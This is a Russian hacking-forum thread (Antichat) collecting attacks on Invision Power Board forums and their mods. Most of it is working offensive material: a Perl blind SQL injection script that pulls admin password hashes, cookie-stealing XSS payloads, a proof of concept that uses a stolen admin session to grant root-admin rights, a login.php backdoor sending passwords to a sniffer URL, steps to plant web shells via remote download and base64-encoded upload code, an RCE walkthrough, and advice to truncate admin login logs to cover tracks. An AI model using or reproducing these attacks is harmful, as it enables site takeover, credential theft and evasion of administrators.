ANTICHAT - [Обзор уязвимостей IPB]

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - [Обзор уязвимостей IPB] (https://forum.antichat.xyz/showthread.php?t=89112)

Уязвимости Модов IPB

Автор _GaLs_

Уязвимости Модов IPB

D21-Shoutbox 1.1

PHP код:


		
			
 #!/usr/bin/perl 



######################################## 

# Coded by k1b0rg (768620) # 

# shout.pl <site> <id> # 

# shout.pl http://site.ru/forum/ 1 # 

# shout.pl http://site.ru/forum/ 1,2 # 

######################################## 



use LWP::UserAgent; 

my $browser = LWP::UserAgent->new(); 

$site=$ARGV[0]; 

my $admins_id=$ARGV[1]; 

@admin=split(',',$admins_id); 

my $res=$browser->get($site.'index.php?act=Shoutbox'); 

if($res->content=~/act=Shoutbox&shout=(d+)/is) 

{ 

my $idshout=$1; 

syswrite STDOUT, "\n".'Shout box found!'; 

my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshout.'\''); 

if($res->content =~ /(SQL error|mySQL query error)/is) 

{ 

syswrite STDOUT, "\n".'Mode(sql) shoutbox: [OK]'; 

if($res->content =~ /FROM (.*?)shoutbox/i) 

{ 

$prefix_bd=$1; 

syswrite STDOUT, "\n".'prefix_bd_shoutbox: ['.$prefix_bd.']'; 

&shout_sql($idshout); 

} 

} 

else { syswrite STDOUT, "\n".'NOT Vulnerebility';} 

} 

else { syswrite STDOUT, "\n".'Shout box mode NOT FOUND!';} 

sub shout_sql($) 

{ 

my $idshout=$_[0]; 

foreach my $id(@admin) 

{ 

syswrite STDOUT, "\n".'Admin id ('.$id.') : ['; 

for($i=1;$i<=32;$i++) 

{ 

&position_shout(97,102,$i,$id,$idshout,'pass') if (!&position_shout(48,57,$i,$id,$idshout,'pass')) 

} 

syswrite STDOUT, ':'; 

for($i=1;$i<=5;$i++) 

{ 

&position_shout(33,126,$i,$id,$idshout,'salt'); 

} 

syswrite STDOUT, ']'; 

} 

} 

sub position_shout($$$$$$) 

{ 

my ($j,$max,$i,$mid,$idshout,$label)=@_; 

while($j<=$max) 

{ 

if(&scan_shout($site,$j,$mid,$i,$idshout,$label)) { syswrite STDOUT, chr($j); return 1;} 

$j++; 

} 

} 

sub scan_shout($$$$$) 

{ 

my ($site,$num,$mid,$pos,$idshout,$label)=@_; 

my $field=($label eq 'pass')?('converge_pass_hash')'converge_pass_sal t'); 

my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshout.'+and(ascii(substring((select+'.$   field.'+from+'.$prefix_bd.'members_converge+where+   converge_id='.$mid.'),'.$pos.',1))='.$num.')/*'); 

return 1 if($res->content=~/varssidss=s[(d+)];/is); 

}

ibProArcade 2.x

SQL Injection Exploit

Цитата:

index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

PS Материал востановлен
Дата публикации: 26.05.2007, 12:20
Автор _GaLs_

Invision Power Board Passive XSS

Автор +toxa+

Passive XSS

бажный кусок кода:

PHP код:


		
			
во всех файлах примерно так 

<html> 

<head> 

  <title>Insert Div/Span</title> 

    <script type="text/javascript"> 

    <!-- 

    //----------------------------------------- 

    // Attempt to get editor ID 

    //----------------------------------------- 

    var editor_id         = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?> 

    var this_module       = 'email'; 

    var this_height       = 300; 

    var allow_advanced    = null; 

    var current_selection = null; 

.... 



в module_bbcodeloader.php также, тока с добавкой 

.... 

    //----------------------------------------- 

    var editor_id         = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?> 

    var bbcode_id         = <?php print '"'.trim($_REQUEST['id']).'";'; ?> 

    var this_module       = 'bbcodeloader'; 

....

xss:

Цитата:

http://localhost/ipb/jscripts/folder_rte_files/module_image.php?editorid=";alert(document.cookie) ;var i="
http://localhost/ipb/jscripts/folder_rte_files/module_table.php?editorid=";alert(document.cookie) ;var i="
http://localhost/ipb/jscripts/folder_rte_files/module_bbcodeloader.php?editorid=alert(document.co okie);/*&id=*/var i="
http://localhost/ipb/jscripts/folder_rte_files/module_div.php?editorid=";alert(document.cookie);v ar i="
http://localhost/ipb/jscripts/folder_rte_files/module_link.php?editorid=";alert(document.cookie); var i="
http://localhost/ipb/jscripts/folder_rte_files/module_email.php?editorid=";alert(document.cookie) ;var i="

применение:

Цитата:

заплатка:
кидаем .htaccess файлик в папку /jscripts/folder_rte_files/ с содержанием

Цитата:

Order Deny,Allow
Deny from all

ЗЫ тестил на версии 2.2.2
ЗЗЫ не пашет при magic_quotes = On =\

PS Материал востановлен
Дата публикации: 07.06.2007, 00:07
Автор+toxa+

Cross Site Scripting vulnerability

Автор +toxa+

Invision Power Board 2.2.2
Cross Site Scripting

PHP код:


		
			
 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

# 

#   Invision Power Board 2.2.2 Cross Site Scripting vulnerability 

# 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

#   Vendor site: http://www.invisionboard.com/ 

#   Vulnerability found by Iron (ironwarez.info) 

# 

#   Greets to all **** Security Group members     

# 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

#   The vulnerability: 

#   Open up any php file in /jscripts/folder_rte_files 

#    See: 



    var editor_id         = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?> 

     

# 

#   $_REQUEST['editorid'] isn't sanitized in any way, so allows 

#   other uses to execute their own code. 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

#   PoC (Log cookies & run SQL query) 

# 

#   Requirements: server supporting PHP, user account on 

#   target forum, database prefix needs to be known. 

# 

#   Create a file called name.php on your webserver and put this code in it: 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 



<?php 

$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash 

$prefix = "ibf_"; #Database prefix, default: ibf_ 

$member = 22; #Member id to promote 

$newgroup = 4; # The id of the new group to promote, normally 4 is root admin 



$ip = $_SERVER['REMOTE_ADDR']; 

$referer = $_SERVER['HTTP_REFERER']; 

$agent = $_SERVER['HTTP_USER_AGENT']; 



$data = $_GET['c']; 

$time = date("Y-m-d G:i:s A"); 

$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n"; 



$file = fopen('log.txt' , 'a'); 

fwrite($file,$text); 

fclose($file); 

if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff)) 

{ 

print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql&section=admin&query=UPDATE+ 

'.$prefix.'members+SET 

+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.  $member.'%27&st="></>'; 

} 

?> 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

#    Also create a file in the same directory named "log.txt" and chmod it 777 

# 

#    Now, create a file called script.js on your webserver, put this code in it: 

# 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 



document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie; 



# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

# 

#    And, last but not least, create a file that combines those two;) 

#    Name it blah.html and put this code in it: 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 



<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></ 

script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

PS Материал востановлен
Дата публикации: 14.06.2007, 18:00
Автор+toxa+

залитие шела

Автор def_

два небольших дополнения, (мож кому полезно будет) к следующим моментам:

(к посту https://forum.antichat.ru/showpost.php?p=912327&postcount=7)

Цитата:

Если возможно изменение исходников, то для того чтоб не брутить хеши:
Создаем какую-нибудь неприметную табличку с полями id, name, password.
находим в /sources/action_public/login.php
(по умолчанию 545'ая строка):

PHP код:


		
			
$ppass=$this->ipsclass->input['PassWord'];

        $this->ipsclass->DB->query("INSERT INTO ibf_subscriptions_import (name,pass) values('$username','$ppass')");

если кто-то не хочет записывать данные в БД, можно традиционно отправить их на снифер, для этого вместе вышеприведенного пишем этот код:

PHP код:


		
			
$ppass=$this->ipsclass->input['PassWord'];

$snifurl = 'http://127.0.0.1/1.php?user='.$username.'&pass='.$ppass;

$fl = @fopen($snifurl, "r");

@fclose( $fl );

(к посту https://forum.antichat.ru/showpost.php?p=912449&postcount=9)

Цитата:

4. Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки:" пишем любой php код, на пример такой:

PHP код:


		
			
$linky="http://site.ru/shell.txt";

$saved="/usr/home/www/site/public_html/forum/

uploads/shell.php";

$from=fopen("$linky","r");

$to=fopen("$saved","w");

while(!feof($from)){

$string=fgets($from,4096);

fputs($to,$string);

}

fclose($to);

fclose($from);

надо в переменной $saved заменять полный путь к папке с аплоадами, на путь с вашего сервера, его можно взять или в "Основных настройках форума" или переменную переписать так:

PHP код:


		
			
$saved=ROOT_PATH . "uploads/shell.php";

PS Материал востановлен
Дата публикации: 17.06.2007, 19:39
Автор def_

Заливка шела Ipb 2.2.2

Автор: n-000

Как то я столкнулся с такой проблемой :
Есть админка от форума IPB v2.2.2, но хотелось бы что то вроде шелла =))
Эта версия оказалась намного доработанней чем прежние и залить шелл казалось мне просто мало реальным. Но я прекрасно осознавал что в форуме с такими наворотами и настройками фсегда найдёца недоработка... мелоч, а приятно -)

Скачал себе такой двиг и начал тестить на локалхосте... вобщем зделал попытку заливки через SQL, там в форуме есть такая фича в админке, как Управление SQL во фкладке ПРОЧЕЕ !
Сработало ! заарал я и приконектился к жэртве -)
Но однако получился облом, т к конфигурация сервера на котором хостился форум более жёсткая чем у меня на локалхосте -(

Патом пробывал залить через фичу добавления смайликов и стилей ... т к я не очень дружу с хмл то порядком поиздевавшись над хмл файликами и своими нервами я бродил по админке и искал другие способы...

И тут во фкладке НАСТРОЙКИ я набрёл на функцию *Добавить настройку* и начал изучать открывшующя пагу... и тут я наткнулся на вот такие слова *Выполнение PHP-кода до отображения или сохранения настройки:* !
Это уже интересней подумал я с расплывающимся ипалом )
И первым жэ делом зделал так:
Сперва я создал настройку (задаёте произвольное название настройке, например 123) и в поле для PHP ввел вот такое

PHP код:


		
			
 $save = 1; до сохранения настройки. 

Используйте $key и $value во время написания PHP-кода. 

include('http://kaki.net/shell.txt');

И тут жэ снова обломался, получив сообщение от форума

+----------------------------------------------------------------+
| You cannot use executable PHP function keywords such as |
| (include, require, include_once, require_once, exec, system and passthru) |
| |
+----------------------------------------------------------------+

-Наивный албанския парень, сказал мне форум (для тех у кого плохо с англицким =))
Но тут сразу жэ задумался - а что если средствами php зделать скрипт для заливки файла, самый наипростейший и зделать простую форму отправки ... и залить шелл на сервер, снова врубил локалхост и начал пробывать ...
Задумка у меня была такой... средствами PHP создам файл в этой же дири что и админка forum/admin/ ! Например conf_ini.php .

листинг файла

PHP код:


		
			
$save=1; 

$scr=base64_decode('PD8NCiR1cGxvYWRkaXIgPSAnQzovdm  FyL3d3dy94eHh4eHh4eC5ydS9kYXRhL2ZvcnVtL2FkbWluLyc7DQppZiAobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ2ZpbG  UnXVsndG1wX25hbWUnXSwgJHVwbG9hZGRpci4kX0ZJTEVTWydm  aWxlJ11bJ25hbWUnXSkpDQoge2VjaG8gJ/Px7+X47e4nO31lbHNle2VjaG8gJ8746OHq4Cc7fQ0KPz4='); 

$fl=fopen('conf_ini.php','w+'); 

@fwrite($fl,$scr);

вот кусок который я закодировал

PHP код:


		
			
<? 

$uploaddir = 'C:/var/www/xxxxxxxx.ru/data/forum/admin/'; 

if (@move_uploaded_file($_FILES['file']['tmp_name'], $uploaddir.$_FILES['file']['name'])) 

 {echo 'ну вот тебе радость';} 

else 

{echo 'обламайся гнус';} 

?>

Тут самое главное правильно указать путь к папке админа, если вы не знаете полный путь можно посмотреть его либо функцией getcwd() либо из появившихся ошибок.

После того как скрипт сработал я почапал по адресу forum/admin/conf_ini.php и увидел надпись о том что скрипт сработал (а сработает он не удачно, т к загрузки пока нет), самое главное скрипт сработал !
Дальше я вернулся к опции настроек и изменил php код уже имеющейся (созданой) настройки на

PHP код:


		
			
 $save=1; 

echo ' 

<form enctype="multipart/form-data" method="post"  



action="http://www.xxxxxxxxx.ru/forum/admin/conf_ini.php"> 

<input type="file" name="file" size="30"><br><BR> 

<input type="submit" value="gooo"> 

</form> 

';

После того как я сохранил эту настройку, вверху поивилось поле (file) с кнопкой (gooo)... Ну и так скать процесс пошёл -) и пошёл неплохо ...
После завершения закачки я зашёл по адресу http://www.xxxxxxxxx.ru/forum/admin/shell.php
и злорадствовал =)))

---------------------------------------------------------------------------
З.Ы.Да, забыл добавить, что создав файлик не на залифку шелла а на инклуд со своей паги сервер залупился и сказал что удалёное использование скрипта через инклуд идёт нахер !

Чистим следы ...

Если вы хотите что бы админ ничего не заподозрил, то можно почистить записи о вашем прибывании в админке IP адресе нике и времени
Хнопочки или стандартной функции на очистку этих данных в админке нет (по крайней мере я не нашёл, так что еси есть нагами не пинайте)
Зделать это можно при помощи того жэ SQL на форуме -))

Идём во фкладку ПРОЧЕЕ ищем там в меню (Управление SQL -> Инструменты) и выбераем таблицу ibf_admin_login_logs, (префикс ibf стоит по умолчанию при инсталяции форума)
Дальше в поле для ввода команд базе прописываем TRUNCATE `ibf2_admin_login_logs`;
Опачки -) и записи пропали -))

PS Материал востановлен
Дата публикации: 03.08.2007, 00:33
Автор n-000

Автор: GreenBear

Цитата:

(include, require, include_once, require_once, exec, system and passthru)

if($ipclass->input['gg']) eval($ipclass->input['gg']);

shell_exec($ipclass->input['gg']);

PS Материал востановлен
Дата публикации: 03.08.2007, 01:01
Автор GreenBear

Invision Power Board <= 2.1.5 Remote Code Execution Tutorial

Автор: +toxa+

Invision Power Board <= 2.1.5

Remote Code Execution

PHP код:


		
			
 #!usr/bin/perl 

## Invision Power Board <= 2.1.5 Remote Code Execution Tutorial 

## By not null  

## Security Bunker Team 

## http://secbun.info 

## It is not an exploit! It is only tutorial, how to exploit a forum! 

print q( 

#-----------------------------------------# 

# Invision Power Board 2.x.x RCE Tutorial # 

# By Security Bunker Team | ©not null     # 

#       http://www.secbun.info            # 

#-----------------------------------------# ); 

print q( 

Step 1: If you are already register on the forum, just login on it. 

Else register  first ;]); 

print "\r\nPress enter when finished...\r\n"; 

$ok = <STDIN>; 



print q( 

Ok, we have successful log in. Let's fun ;] 

Step 2: Go to some of the forum, where you could post messages. 

Step 3: Post a message, that consist our harmful code (muahaha) 

The code is: "eval(phpinfo()); //" [without quotes] 

); 

print "\r\nPress enter when finished...\r\n"; 

$ok = <STDIN>; 

print q(When message is post, open a new page in your browser and go to the Search  

(index.php?act=search). Use the search form to find your post just by your username.  

And make sure "Show results as posts" is selected.); 

print "\r\nPress enter when finished...\r\n"; 

$ok = <STDIN>; 

print q(You must see your post, that consist our code. 

Then add to the end of the url next string:); 

print "\r\n&lastdate=z|eval.*?%20//)%23e%00\r\n"; 

print q(and press enter...); 

print "\r\nPress enter when finished...\r\n"; 

$ok = <STDIN>; 

print q(Can you see a result of phpinfo? If yes, we have successful exploited forum :-] 

So, let's modify our post to get a shell. 

But on this step we have a problem: we can't use arguments in functions (e.g. system("ls")) in such form. 

But we can use it by it's code (e.g. system(chr(34).chr(108).chr(115).chr(34))) 

I'm include a simple tool, that will help you to encode you string into code. 

Just type your command, and you will get a string, that you can copy and paste into your post); 

print "\r\n"; 

$out = ""; 

while () 

 { 

    print "\r\nCommand for encode or 'exit' for exit "; 

    while(<STDIN>) 

     { 

        $cmd=$_; 

        chomp($cmd); 

        exit() if ($cmd eq 'exit); 

        last; 

     } 

     $len = length($cmd); 

     for ($i=0; $i<$len; $i++) 

        { 

         $s = substr($cmd,$i,1); 

         $out.="chr(".ord($s).")"; 

         if($i != $len-1)  

            { 

             $out.="."; 

            } 

           

        } 

    print "eval(system(".$out.").chr(59).exit()); //"; 

    $out = ""; 

 }

PS Материал востановлен
Дата публикации: 15.08.2007, 14:58
Автор +toxa+

Passive XSS IPB <=1.3, <=2.1.6

Автор: blackybr

Если кто думает что xss в админах неактуальны - пусть это не читает! =)
Как раз они то нам и нужны. Какой нам прок от обычного пользователя? Подавай нам админа.

Passive XSS
IPB <=1.3

Цитата:

admin.php?adsess='><script>alert(/xek/)</script>

IPB <=2.1.6

Цитата:

/admin.php?phpinfo=<script>alert(/xek/)</script>

Также в довольно старой версии 1.2 присутствует активная ксс

Цитата:

text
will made the HTML : <span style='font-family:expression( alert(document.cookie))'>text</span>

[COLOR=expression( alert(document.cookie))] texte[/COLOR]

will made the HTML : <span style='color:expression( alert(document.cookie))'>text</span>

PS Материал востановлен
Дата публикации: 06.10.2007, 17:42
Автор blackybr

Invision Gallery <= 2.0.7 Remote SQL Injection

Автор: iddqd

Vulnerable: Invision Gallery <= 2.0.7

Remote SQL Injection

Exploit:

http://milw0rm.com/exploits/4966

PS Материал востановлен
Дата публикации: 23.01.2008, 15:25
Автор iddqd

Active XSS IPB<=2.3.3

Автор: XenOtai

IPB <-2.3.3

Цитата:

[img*]http://qw.ru/qw[url*]http://onerror=alert(/Hack/)//[/url*].jpg[/img*]

Found by XenOtai from Veronal H2S Team.

Работает в осле и лисе.

Если выдает ошибку:

THE FOLLOWING ERROR(S) WERE FOUND
Sorry, dynamic pages in the [IMG] tags are not allowed
(Динамические страницы в тегах [img] запрещены)

значит пропатчен.

PS Материал востановлен
Дата публикации: 21.11.2007, 02:42
Автор XenOtai